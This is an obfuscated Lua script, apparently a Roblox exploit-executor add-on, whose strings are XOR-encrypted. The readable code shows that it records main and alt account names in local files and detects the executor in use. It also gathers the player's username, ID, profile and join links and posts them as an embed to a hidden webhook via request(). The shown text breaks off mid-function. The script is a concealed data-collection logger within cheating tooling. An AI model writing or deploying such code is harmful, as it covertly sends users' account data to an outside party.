--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
local TABLE_TableIndirection = {};
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\222\193\221\26\228\178\211\18\216\193\158\117", "\126\177\163\187\69\134\219\167")] = bit32 or bit;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\44\207\44\250\196\12\255\111\149", "\156\67\173\74\165")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\59\181\79\41\190\47\82\56\190\75\83\236", "\38\84\215\41\118\220\70")].bxor;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\95\20\36\45\209\98\83\114", "\158\48\118\66\114")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\164\38\22\9\113\172\239\167\45\18\115\35", "\155\203\68\112\86\19\197")].bor;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\73\223\48\195\97\86\193\189\22", "\152\38\189\86\156\32\24\133")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\243\85\161\121\254\94\179\74\245\85\226\22", "\38\156\55\199")].band;
local function readMainAccount()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\174\116\112\45\61\117\247\70\237\45", "\35\200\29\28\72\115\20\154")] = LUAOBFUSACTOR_DECRYPT_STR_0("\26\176\159\203\149\56", "\84\121\223\177\191\237\76");
	if isfile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\189\95\197\165\20\81\61\196\254\6", "\161\219\54\169\192\90\48\80")]) then
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\74\77\14\49\76\76\20\96\25", "\69\41\34\96")] = readfile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\186\202\219\15\44\42\177\198\146\90", "\75\220\163\183\106\98")]);
		local mainAccount, altAccounts = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\1\181\133\35\220\12\174\206\103", "\185\98\218\235\87")]:match(LUAOBFUSACTOR_DECRYPT_STR_0("\131\114\108\175\132\226\133\118\110", "\202\171\92\71\134\190"));
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\40\205\56\169\42\194\35\157\39\213\0\129\58\213\105\216", "\232\73\161\76")] = {};
		if altAccounts then
			for alt in altAccounts:gmatch(LUAOBFUSACTOR_DECRYPT_STR_0("\128\231\14\96\85", "\126\219\185\34\61")) do
				table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\13\194\74\83\125\116\252\242\2\218\114\123\109\99\182\183", "\135\108\174\62\18\30\23\147")], alt);
			end
		end
		return mainAccount, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\183\229\62\234\27\173\60\210\184\253\6\194\11\186\118\151", "\167\214\137\74\171\120\206\83")];
	end
	return nil, {};
end
local function writeMainAccount(mainAccount, altAccounts)
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\141\249\62\88\214\166\134\245\119\13", "\199\235\144\82\61\152")] = LUAOBFUSACTOR_DECRYPT_STR_0("\4\25\247\63\31\2", "\75\103\118\217");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\198\88\100\53\186\29\200\65\126\0\170\45\211\70\53\68", "\126\167\52\16\116\217")] = table.concat(altAccounts, ",");
	writefile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\206\39\44\133\154\24\241\205\107\112", "\156\168\78\64\224\212\121")], mainAccount .. ":" .. TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\6\226\177\239\4\237\170\219\9\250\182\253\19\252\224\158", "\174\103\142\197")]);
end
local function getCounter()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\80\33\83\61\11\95\245\83\109\15", "\152\54\72\63\88\69\62")] = LUAOBFUSACTOR_DECRYPT_STR_0("\215\138\250\68\192", "\60\180\164\142");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\91\81\16\39\51\168\66", "\114\56\62\101\73\71\141")] = 0;
	if isfile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\190\224\215\193\150\232\214\193\253\185", "\164\216\137\187")]) then
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\209\233\63\166\163\240\31\151\182", "\107\178\134\81\210\198\158")] = readfile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\62\7\142\195\132\57\3\135\131\250", "\202\88\110\226\166")]);
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\192\0\151\249\222\134\95", "\170\163\111\226\151")] = tonumber(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\18\63\188\44\75\57\61\84\96", "\73\113\80\210\88\46\87")]) or 0;
	else
		writefile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\135\37\193\23\201\128\33\200\87\183", "\135\225\76\173\114")], tostring(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\25\226\173\190\184\248\247", "\199\122\141\216\208\204\221")]));
	end
	count = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\162\223\22\207\89\216\137\152\64", "\150\205\189\112\144\24")](TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\38\139\170\66\16\205\65", "\112\69\228\223\44\100\232\113")], 1) + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\219\29\1\236\153\78\195\132", "\230\180\127\103\179\214\28")](TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\143\10\74\72\240\4\176", "\128\236\101\63\38\132\33")], 1);
	writefile(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\170\160\29\65\152\234\194\169\236\65", "\175\204\201\113\36\214\139")], tostring(count));
	return count;
end
local function detectExecutor()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\66\212\48\223\17\83\195\39\248\1\83\201\54\200\1\67\137\101", "\100\39\172\85\188")] = LUAOBFUSACTOR_DECRYPT_STR_0("\152\118\178\142\60\186\118", "\83\205\24\217\224");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\227\221\200\62\243\209\194\47\197\205\200\62\237\214\136\109", "\93\134\165\173")] = {{[LUAOBFUSACTOR_DECRYPT_STR_0("\189\250\196\193\49", "\30\222\146\161\162\90\174\210")]=(typeof(syn) == LUAOBFUSACTOR_DECRYPT_STR_0("\241\79\114\6\224", "\106\133\46\16")),[LUAOBFUSACTOR_DECRYPT_STR_0("\86\33\126\249", "\32\56\64\19\156\58")]=LUAOBFUSACTOR_DECRYPT_STR_0("\105\209\235\87\74\225\133", "\224\58\168\133\54\58\146")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\90\94\78\254\126", "\107\57\54\43\157\21\230\231")]=(typeof(fluxus) == LUAOBFUSACTOR_DECRYPT_STR_0("\207\138\19\249\188", "\175\187\235\113\149\217\188")),[LUAOBFUSACTOR_DECRYPT_STR_0("\50\174\140\73", "\24\92\207\225\44\131\25")]=LUAOBFUSACTOR_DECRYPT_STR_0("\109\223\173\84\14\110", "\29\43\179\216\44\123")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\190\209\37\79\182", "\44\221\185\64")]=(typeof(solara) == LUAOBFUSACTOR_DECRYPT_STR_0("\21\230\74\83\118", "\19\97\135\40\63")),[LUAOBFUSACTOR_DECRYPT_STR_0("\160\93\62\62", "\81\206\60\83\91\79")]=LUAOBFUSACTOR_DECRYPT_STR_0("\125\164\220\115\61\194", "\196\46\203\176\18\79\163\45")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\187\42\123\29\47", "\143\216\66\30\126\68\155")]=(typeof(awp) == LUAOBFUSACTOR_DECRYPT_STR_0("\190\201\15\199\192", "\129\202\168\109\171\165\195\183")),[LUAOBFUSACTOR_DECRYPT_STR_0("\44\89\58\221", "\134\66\56\87\184\190\116")]=LUAOBFUSACTOR_DECRYPT_STR_0("\29\6\57", "\85\92\81\105\219\121\139\65")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\254\187\85\70\119", "\191\157\211\48\37\28")]=(typeof(delta) == LUAOBFUSACTOR_DECRYPT_STR_0("\203\30\246\16\63", "\90\191\127\148\124")),[LUAOBFUSACTOR_DECRYPT_STR_0("\118\134\35\18", "\119\24\231\78")]=LUAOBFUSACTOR_DECRYPT_STR_0("\166\40\169\94\221", "\113\226\77\197\42\188\32")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\57\30\241\182\49", "\213\90\118\148")]=(typeof(codex) == LUAOBFUSACTOR_DECRYPT_STR_0("\79\47\182\90\72", "\45\59\78\212\54")),[LUAOBFUSACTOR_DECRYPT_STR_0("\30\87\142\142", "\144\112\54\227\235\230\78\205")]=LUAOBFUSACTOR_DECRYPT_STR_0("\144\39\11\249\200", "\59\211\72\111\156\176")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\77\143\230\46\69", "\77\46\231\131")]=(typeof(hydrogen) == LUAOBFUSACTOR_DECRYPT_STR_0("\174\85\180\76\191", "\32\218\52\214")),[LUAOBFUSACTOR_DECRYPT_STR_0("\64\22\60\173", "\58\46\119\81\200\145\208\37")]=LUAOBFUSACTOR_DECRYPT_STR_0("\3\149\52\190\166\186\51\37", "\86\75\236\80\204\201\221")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\113\73\114\134\245", "\235\18\33\23\229\158")]=(typeof(xeno) == LUAOBFUSACTOR_DECRYPT_STR_0("\68\187\195\183\85", "\219\48\218\161")),[LUAOBFUSACTOR_DECRYPT_STR_0("\234\112\113\76", "\128\132\17\28\41\187\47")]=LUAOBFUSACTOR_DECRYPT_STR_0("\57\55\8\53", "\61\97\82\102\90")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\175\38\174\72\204", "\105\204\78\203\43\167\55\126")]=(typeof(swift) == LUAOBFUSACTOR_DECRYPT_STR_0("\177\171\33\18\22", "\49\197\202\67\126\115\100\167")),[LUAOBFUSACTOR_DECRYPT_STR_0("\57\90\210\44", "\62\87\59\191\73\224\54")]=LUAOBFUSACTOR_DECRYPT_STR_0("\212\21\243\207\243", "\169\135\98\154")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\200\127\33\87\246", "\168\171\23\68\52\157\83")]=(typeof(arceusx) == LUAOBFUSACTOR_DECRYPT_STR_0("\224\112\247\161\32", "\231\148\17\149\205\69\77")),[LUAOBFUSACTOR_DECRYPT_STR_0("\142\166\202\254", "\159\224\199\167\155\55")]=LUAOBFUSACTOR_DECRYPT_STR_0("\214\225\63\215\226\224\124\234", "\178\151\147\92")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\143\245\73\49\25", "\26\236\157\44\82\114\44")]=(typeof(identifyexecutor) == LUAOBFUSACTOR_DECRYPT_STR_0("\44\59\219\88\62\39\218\85", "\59\74\78\181")),[LUAOBFUSACTOR_DECRYPT_STR_0("\43\208\87\95", "\211\69\177\58\58")]=identifyexecutor()},{[LUAOBFUSACTOR_DECRYPT_STR_0("\180\237\124\246\226", "\171\215\133\25\149\137")]=(typeof(is_protosmasher_caller) == LUAOBFUSACTOR_DECRYPT_STR_0("\231\221\60\249\251\57\243\76", "\34\129\168\82\154\143\80\156")),[LUAOBFUSACTOR_DECRYPT_STR_0("\139\179\62\14", "\233\229\210\83\107\40\46")]=LUAOBFUSACTOR_DECRYPT_STR_0("\241\80\61\194\10\242\79\51\197\13\196\80", "\101\161\34\82\182")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\235\5\92\253\208", "\78\136\109\57\158\187\130\226")]=(typeof(getgenv) == LUAOBFUSACTOR_DECRYPT_STR_0("\56\42\247\242\42\54\246\255", "\145\94\95\153")),[LUAOBFUSACTOR_DECRYPT_STR_0("\243\204\25\208", "\215\157\173\116\181\46")]=LUAOBFUSACTOR_DECRYPT_STR_0("\18\177\133\247\200\60\183\203\215\194\48\183\158\230\213\39\244\195\245\223\33\179\142\252\204\124", "\186\85\212\235\146")},{[LUAOBFUSACTOR_DECRYPT_STR_0("\193\137\19\253\50", "\56\162\225\118\158\89\142")]=(typeof(setreadonly) == LUAOBFUSACTOR_DECRYPT_STR_0("\90\16\206\172\54\209\83\11", "\184\60\101\160\207\66")),[LUAOBFUSACTOR_DECRYPT_STR_0("\63\131\113\185", "\220\81\226\28")]=LUAOBFUSACTOR_DECRYPT_STR_0("\52\208\140\254\248\206\16\149\167\227\239\196\6\193\141\233\170\143\0\208\150\233\239\198\23\218\140\247\243\142", "\167\115\181\226\155\138")}};
	for _, exec in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\231\58\226\95\110\101\201\240\1\239\89\120\122\213\167\114", "\166\130\66\135\60\27\17")]) do
		if exec.check then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\65\82\203\118\37\80\69\220\81\53\80\79\205\97\53\64\15\158", "\80\36\42\174\21")] = exec.name;
			break;
		end
	end
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\75\8\50\121\91\4\56\104\106\21\35\127\77\4\50\126\11\64", "\26\46\112\87")];
end
local function getPlayerInfo()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\169\47\170\109\186\173\0\228", "\212\217\67\203\20\223\223\37")] = game.Players.LocalPlayer;
	return {[LUAOBFUSACTOR_DECRYPT_STR_0("\180\140\165\215", "\178\218\237\200")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\166\185\231\201\179\167\163\128", "\176\214\213\134")].Name,[LUAOBFUSACTOR_DECRYPT_STR_0("\240\164\165\196\164\87\64\218\172\187\209", "\57\148\205\214\180\200\54")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\2\241\52\45\115\0\184\101", "\22\114\157\85\84")].DisplayName,[LUAOBFUSACTOR_DECRYPT_STR_0("\209\216\22\214\116\242", "\200\164\171\115\164\61\150")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\174\248\2\92\134\172\177\83", "\227\222\148\99\37")].UserId,[LUAOBFUSACTOR_DECRYPT_STR_0("\50\68\83\226\248\33\103\64\250", "\153\83\50\50\150")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\85\98\103\12\96\241\2\18\97\100\11\61\185\66\95\122\124\4\61\168\66\80\57\123\25\114\175\94\85\121\103\81\103\163\88\80\116\125\29\122\167\2\84\123\114\27\118\244\88\78\115\97\53\119\246", "\45\61\22\19\124\19\203") .. TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\209\30\12\236\7\98\252\145", "\217\161\114\109\149\98\16")].UserId .. LUAOBFUSACTOR_DECRYPT_STR_0("\84\55\49\120\168\124\79\116\106\44\250\124\23\41\63\116\168\41\70\114\104\58\186\123\0\45\57\104\225\100\28\39", "\20\114\64\88\28\220")),[LUAOBFUSACTOR_DECRYPT_STR_0("\33\19\221\178\241\220\184\29\8\220\191", "\221\81\97\178\212\152\176")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\197\243\9\235\9\151\168\82\236\13\218\169\15\244\24\193\232\5\181\25\194\234\82\238\9\200\245\14\180", "\122\173\135\125\155") .. TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\148\205\1\160\58\35\141\212", "\168\228\161\96\217\95\81")].UserId .. LUAOBFUSACTOR_DECRYPT_STR_0("\148\193\60\83\41\94\215\212", "\55\187\177\78\60\79")),[LUAOBFUSACTOR_DECRYPT_STR_0("\39\193\86\229\106\198\142\38", "\224\77\174\63\139\38\175")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\140\85\76\62\151\27\23\97\147\86\79\96\150\78\90\34\139\89\22\45\139\76\23\41\133\76\93\61\203", "\78\228\33\56") .. game.PlaceId)};
end
local function createEmbed(playerInfo, executor, counter, titleType, mainAccount, altAccounts)
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\218\119\166\15\128\221\59\226", "\229\174\30\210\99")] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\29\228\148\66\249\2\60\3\232\133\68\249\52\54\21", "\89\123\141\230\49\141\93")]=LUAOBFUSACTOR_DECRYPT_STR_0("\210\49\197\15\2\67\227\101\243\30\80\110\246\101\243\15\4\79\247", "\42\147\17\150\108\112"),[LUAOBFUSACTOR_DECRYPT_STR_0("\28\167\32\122\216\233\12\165\34\106\233\252", "\136\111\198\77\31\135")]=LUAOBFUSACTOR_DECRYPT_STR_0("\48\12\234\83\165\225\20\188\22\12\163\22\142\231\5\160\18\29\231\114\184\240\18\170\22\12\163", "\201\98\105\199\54\221\132\119"),[LUAOBFUSACTOR_DECRYPT_STR_0("\189\5\133\39\7\39\169\183\24\188\32\1\54\163\172\2\151", "\204\217\108\227\65\98\85")]=LUAOBFUSACTOR_DECRYPT_STR_0("\127\207\225\165\13\195\93\204\224\235\56\128\109\192\231\236\60\212\91\209\181\193\41\212\91\192\225\224\40", "\160\62\163\149\133\76")};
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\208\169\8\35\199\197\229\93", "\163\182\192\109\79")] = {{[LUAOBFUSACTOR_DECRYPT_STR_0("\58\39\13\197", "\149\84\70\96\160")]=LUAOBFUSACTOR_DECRYPT_STR_0("\8\10\12\244\61\20\77\195\57\11\8", "\141\88\102\109"),[LUAOBFUSACTOR_DECRYPT_STR_0("\165\82\198\101\31", "\161\211\51\170\16\122\93\53")]=playerInfo.name,[LUAOBFUSACTOR_DECRYPT_STR_0("\242\160\190\33\245\171", "\72\155\206\210")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\72\123\89\11", "\83\38\26\52\110")]=LUAOBFUSACTOR_DECRYPT_STR_0("\124\30\52\86\84\22\62\6\118\22\42\67", "\38\56\119\71"),[LUAOBFUSACTOR_DECRYPT_STR_0("\229\238\84\195\32", "\54\147\143\56\182\69")]=playerInfo.displayName,[LUAOBFUSACTOR_DECRYPT_STR_0("\223\143\243\64\209\211", "\191\182\225\159\41")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\37\19\37\80", "\162\75\114\72\53\235\231")]=LUAOBFUSACTOR_DECRYPT_STR_0("\188\48\69\251\86\16\204\21\96", "\98\236\92\36\130\51"),[LUAOBFUSACTOR_DECRYPT_STR_0("\178\24\0\175\64", "\80\196\121\108\218\37\200\213")]=tostring(playerInfo.userId),[LUAOBFUSACTOR_DECRYPT_STR_0("\9\125\14\118\69\11", "\234\96\19\98\31\43\110")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\8\30\95\194", "\235\102\127\50\167\204\18")]=LUAOBFUSACTOR_DECRYPT_STR_0("\117\185\240\32\81\58\95\179\181\22\87\43\84", "\78\48\193\149\67\36"),[LUAOBFUSACTOR_DECRYPT_STR_0("\38\31\140\13\68", "\33\80\126\224\120")]=executor,[LUAOBFUSACTOR_DECRYPT_STR_0("\229\166\15\205\82\233", "\60\140\200\99\164")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\137\245\9\35", "\194\231\148\100\70")]=LUAOBFUSACTOR_DECRYPT_STR_0("\101\67\212\173\226\205\84", "\168\38\44\161\195\150"),[LUAOBFUSACTOR_DECRYPT_STR_0("\150\253\142\99\53", "\118\224\156\226\22\80\136\214")]=tostring(counter),[LUAOBFUSACTOR_DECRYPT_STR_0("\75\224\85\137\76\235", "\224\34\142\57")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\208\166\200\216", "\110\190\199\165\189\19\145\61")]=LUAOBFUSACTOR_DECRYPT_STR_0("\234\249\120\238\130\203\223\171\91\225\133\204", "\167\186\139\23\136\235"),[LUAOBFUSACTOR_DECRYPT_STR_0("\12\180\132\24\31", "\109\122\213\232")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\213\199\176\63\232\254\174\53\211\191", "\80\142\151\194") .. playerInfo.profileLink .. ")"),[LUAOBFUSACTOR_DECRYPT_STR_0("\10\200\123\69\13\195", "\44\99\166\23")]=false},{[LUAOBFUSACTOR_DECRYPT_STR_0("\114\246\36\51", "\196\28\151\73\86\83")]=LUAOBFUSACTOR_DECRYPT_STR_0("\217\12\32\30\194\127\25\123\246", "\22\147\99\73\112\226\56\120"),[LUAOBFUSACTOR_DECRYPT_STR_0("\174\116\238\224\136", "\237\216\21\130\149")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\185\100\80\86\190\137\121\131\67\90\98\248", "\62\226\46\63\63\208\169") .. playerInfo.joinLink .. ")"),[LUAOBFUSACTOR_DECRYPT_STR_0("\236\23\89\138\17\8", "\62\133\121\53\227\127\109\79")]=false}};
	if ((titleType == LUAOBFUSACTOR_DECRYPT_STR_0("\20\29\52\243\211\188\167\30\0\13\244\213\173\173\5\26\38", "\194\112\116\82\149\182\206")) and mainAccount) then
		table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\63\161\73\20\196\241\75\105", "\110\89\200\44\120\160\130")], {[LUAOBFUSACTOR_DECRYPT_STR_0("\165\194\70\67", "\45\203\163\43\38\35\42\91")]=LUAOBFUSACTOR_DECRYPT_STR_0("\255\132\213\45\199\136\87\209\138\201\45\147", "\52\178\229\188\67\231\201"),[LUAOBFUSACTOR_DECRYPT_STR_0("\55\64\92\17\242", "\67\65\33\48\100\151\60")]=mainAccount,[LUAOBFUSACTOR_DECRYPT_STR_0("\214\233\162\209\253\218", "\147\191\135\206\184")]=false});
		if (#altAccounts > 0) then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\133\36\178\224\219\80\189\145\38\178\210\244\90\161\144\109\246", "\210\228\72\198\161\184\51")] = table.concat(altAccounts, LUAOBFUSACTOR_DECRYPT_STR_0("\122\9", "\174\86\41\147\112\19"));
			table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\93\9\136\7\33\28\84\251", "\203\59\96\237\107\69\111\113")], {[LUAOBFUSACTOR_DECRYPT_STR_0("\42\23\161\228", "\183\68\118\204\129\81\144")]=LUAOBFUSACTOR_DECRYPT_STR_0("\47\161\100\164\42\129\13\162\101\234\31\145", "\226\110\205\16\132\107"),[LUAOBFUSACTOR_DECRYPT_STR_0("\253\194\236\204\68", "\33\139\163\128\185")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\86\84\16\255\84\91\11\203\89\76\23\242\94\75\16\155\7", "\190\55\56\100")],[LUAOBFUSACTOR_DECRYPT_STR_0("\95\161\48\23\29\230", "\147\54\207\92\126\115\131")]=false});
		end
		table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\11\56\48\113\9\109\72\97", "\30\109\81\85\29\109")], {[LUAOBFUSACTOR_DECRYPT_STR_0("\241\112\89\179", "\156\159\17\52\214\86\190")]=LUAOBFUSACTOR_DECRYPT_STR_0("\128\234\170\252\143\227\169\252\143\236\190\179\187\225\169", "\220\206\143\221"),[LUAOBFUSACTOR_DECRYPT_STR_0("\144\124\33\2\221", "\178\230\29\77\119\184\172")]=playerInfo.name,[LUAOBFUSACTOR_DECRYPT_STR_0("\252\176\6\18\121\253", "\152\149\222\106\123\23")]=false});
	end
	return {[LUAOBFUSACTOR_DECRYPT_STR_0("\201\47\226\79\176", "\213\189\70\150\35")]=(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\91\92\96\4\74\70\49\88", "\104\47\53\20")][titleType] or LUAOBFUSACTOR_DECRYPT_STR_0("\134\84\132\31\169\27\172\94\193\56\185\27\166\79\149\25\184", "\111\195\44\225\124\220")),[LUAOBFUSACTOR_DECRYPT_STR_0("\220\67\19\112\185\162\200\82\9\124\165", "\203\184\38\96\19\203")]=LUAOBFUSACTOR_DECRYPT_STR_0("\24\125\57\68\214\60\112\108\85\193\43\51\110\64\221\121\119\124\85\203\58\103\124\69\142\48\125\57\85\198\60\51\126\64\195\60\50", "\174\89\19\25\33"),[LUAOBFUSACTOR_DECRYPT_STR_0("\44\29\94\65\229", "\107\79\114\50\46\151\231")]=15158332,[LUAOBFUSACTOR_DECRYPT_STR_0("\63\175\176\37\142\42", "\160\89\198\213\73\234\89\215")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\78\120\177\242\193\91\52\228", "\165\40\17\212\158")],[LUAOBFUSACTOR_DECRYPT_STR_0("\241\209\29\62\36\235\216\1\63", "\70\133\185\104\83")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\17\87\72", "\169\100\37\36\74")]=playerInfo.avatarUrl},[LUAOBFUSACTOR_DECRYPT_STR_0("\6\136\173\68\5\149", "\48\96\231\194")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\220\95\22\57", "\227\168\58\110\77\121\184\207")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\95\57\171\69\178\207\116\161\59\61\171\0", "\197\27\92\223\32\209\187\17") .. os.date(LUAOBFUSACTOR_DECRYPT_STR_0("\70\102\142\190\14\18\134\255\67\26\235\161\70\114\153\190\48", "\155\99\63\163")))}};
end
local function sendWebhook(url, embed)
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\138\197\181\157\252\212", "\228\226\177\193\237\217")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\28\164\55\246\7\181\49\240\61\179\38", "\134\84\208\67"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\27\169\135\88\22\190\149\25\67", "\60\115\204\230")] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\196\53\229\100\226\52\255\61\211\35\251\117", "\16\135\90\139")]=LUAOBFUSACTOR_DECRYPT_STR_0("\85\100\22\63\71\87\121\64\125\9\61\1\94\107\91\122", "\24\52\20\102\83\46\52")};
	request({[LUAOBFUSACTOR_DECRYPT_STR_0("\241\61\45", "\111\164\79\65\68")]=url,[LUAOBFUSACTOR_DECRYPT_STR_0("\235\220\151\214\33\238", "\138\166\185\227\190\78")]=LUAOBFUSACTOR_DECRYPT_STR_0("\251\91\246\3", "\121\171\20\165\87\50\67"),[LUAOBFUSACTOR_DECRYPT_STR_0("\238\61\184\50\188\16\213", "\98\166\88\217\86\217")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\254\243\120\5\131\206\229\179\41", "\188\150\150\25\97\230")],[LUAOBFUSACTOR_DECRYPT_STR_0("\248\134\91\27", "\141\186\233\63\98\108")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\249\254\56\166\96\161", "\69\145\138\76\214")]:JSONEncode({[LUAOBFUSACTOR_DECRYPT_STR_0("\117\194\139\140\187\5", "\118\16\175\233\233\223")]={embed}})});
end
local function processWebhookSend()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\155\136\52\162\235\153\56\219", "\29\235\228\85\219\142\235")] = game.Players.LocalPlayer;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\49\219\185\220\123\126\43\83\36\209\168\243\118\67\34\23\109", "\50\93\180\218\189\23\46\71")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\206\168\90\85\65\206\13\142", "\40\190\196\59\44\36\188")].Name;
	local mainAccount, altAccounts = readMainAccount();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\63\74\201\186\238\120\31\121\21", "\109\92\37\188\212\154\29")] = getCounter();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\1\247\161\192\36\78\11\253\225\147", "\58\100\143\196\163\81")] = detectExecutor();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\10\78\34\186\58\91\204\0\28\77\102\243", "\110\122\34\67\195\95\41\133")] = getPlayerInfo();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\98\180\89\66\217\122\186\110\88\218\48\225", "\182\21\209\59\42")] = "";
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\178\90\199\24\37\251\231", "\222\215\55\165\125\65")] = nil;
	if not mainAccount then
